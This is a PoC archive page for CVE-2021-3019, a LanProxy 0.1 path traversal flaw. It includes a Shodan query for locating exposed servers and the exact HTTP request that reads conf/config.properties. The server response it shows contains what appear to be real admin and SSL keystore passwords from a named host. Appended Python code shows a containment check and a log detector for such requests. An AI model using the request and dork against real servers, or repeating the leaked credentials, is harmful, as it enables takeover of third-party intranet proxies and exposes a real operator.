PoC details: ba71a07aaf23e75deff40bac3e32269d88cf57e4

Source
Related vulnerability
Title: Ffay Lanproxy path traversal vulnerability (CVE-2021-3019)
Description: Ffay Lanproxy is an intranet penetration (NAT traversal) tool by the individual developer Ffay that proxies services on a LAN to the public network. ffay lanproxy 0.1 has a path traversal vulnerability that allows directory traversal to read /../conf/config.properties and obtain the credentials for the intranet connection.
Description
[CVE-2021-3019] LanProxy Directory Traversal
Introduction
<b>[CVE-2021-3019] LanProxy Directory Traversal</b>
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 

Lanproxy is an intranet penetration tool that proxies LAN personal computers and servers to the public network.
It supports TCP traffic forwarding and therefore any protocol carried over TCP (access to intranet websites, local payment interface debugging, SSH access,
remote desktop, etc.). LanProxy version 0.1 is vulnerable to path traversal, which may allow reading `conf/config.properties` to obtain credentials for the intranet connection.

Shodan search: `"Server: LPS-0.1"`

Reading the configuration file:

```http
GET /../conf/config.properties HTTP/1.1
Host: vulnerablehost:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
```

```http
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Server: LPS-0.1

server.bind=0.0.0.0

#Port for communicating with the proxy client
#This is the port the client connects to
server.port=4900

#SSL-related configuration
server.ssl.enable=true
server.ssl.bind=0.0.0.0
server.ssl.port=4993
server.ssl.jksPath=usa.nat.candycloud.xyz
server.ssl.keyStorePassword=j5740NtBDCdH1ay
server.ssl.keyManagerPassword=j5740NtBDCdH1ay

#This setting can be ignored
server.ssl.needsClientAuth=false

#Web online configuration management settings
#Server IP address; the default usually does not need changing
config.server.bind=0.0.0.0

#Backend control panel port (open it in the security group)
config.server.port=8090

#Backend control panel username and password
config.admin.username=admin
config.admin.password=Twx7x03hCBbmwtr
```

![Image of PoC](https://github.com/murataydemir/CVE-2021-3019/blob/main/Screen%20Shot%202021-03-03%20at%2000.57.50.png)
![Image of PoC](https://github.com/murataydemir/CVE-2021-3019/blob/main/Screen%20Shot%202021-03-03%20at%2001.01.13.png)
![Image of PoC](https://github.com/murataydemir/CVE-2021-3019/blob/main/Screen%20Shot%202021-03-03%20at%2001.01.23.png)
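As an added example (not code from the original PoC or from the LanProxy project), the following Python contrasts a naive root-plus-path join, which turns the request above into a read of `conf/config.properties` one directory above the web root, with a containment check that rejects it, and then applies that check to constructed access-log lines as a simple detection. The web root and the log-line shape are assumptions.

```python
from __future__ import annotations
import posixpath
from urllib.parse import unquote

# Hypothetical layout (the page only shows conf/ being reachable via ../):
# static files under WEB_ROOT, config.properties one directory up in conf/.
WEB_ROOT = "/opt/lanproxy/webpages"

def naive_resolve(web_root: str, raw_path: str) -> str:
    """Join root and request path with no containment check, as a traversal-prone
    server would; normpath shows which file the OS would actually open."""
    return posixpath.normpath(posixpath.join(web_root, raw_path.lstrip("/")))

def safe_resolve(web_root: str, raw_path: str) -> str | None:
    """Map a request path to a file under web_root, or None if it would escape.
    Percent-decoding is repeated to defeat double encoding, backslashes count as
    separators, NUL bytes are rejected, and '..' is applied segment by segment."""
    path = raw_path.split("?", 1)[0]
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    if "\x00" in path:
        return None
    segments: list[str] = []
    for seg in path.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not segments:
                return None  # would climb above web_root
            segments.pop()
        else:
            segments.append(seg)
    return posixpath.join(web_root, *segments) if segments else web_root

# Constructed access-log lines in a minimal "method path status" shape.
SAMPLE_LOG = [
    "GET /index.html 200",
    "GET /../conf/config.properties 200",
    "GET /%2e%2e/conf/config.properties 200",
    "GET /js/../css/app.css 200",
]

def flag_traversal(log_lines: list[str], web_root: str = WEB_ROOT) -> list[str]:
    """Return the request paths in log_lines that safe_resolve would reject."""
    paths = [line.split()[1] for line in log_lines if len(line.split()) >= 2]
    return [p for p in paths if safe_resolve(web_root, p) is None]
```

Note that `/js/../css/app.css` is accepted: `..` is only a problem when it climbs past the web root, so a detector that simply greps for `..` would over-alert on legitimate relative links.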

File snapshot

```
[4.0K] /data/pocs/ba71a07aaf23e75deff40bac3e32269d88cf57e4
├── [2.1K] README.md
├── [263K] Screen Shot 2021-03-03 at 00.57.50.png
├── [233K] Screen Shot 2021-03-03 at 01.01.13.png
└── [232K] Screen Shot 2021-03-03 at 01.01.23.png

0 directories, 4 files
```
Notes
    1. Prefer to access the PoC via the source link.
    2. If the source is no longer available, email f.jinxu#gmail.com to request the local snapshot (replace # with @).
    3. Shenlong has snapshotted the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.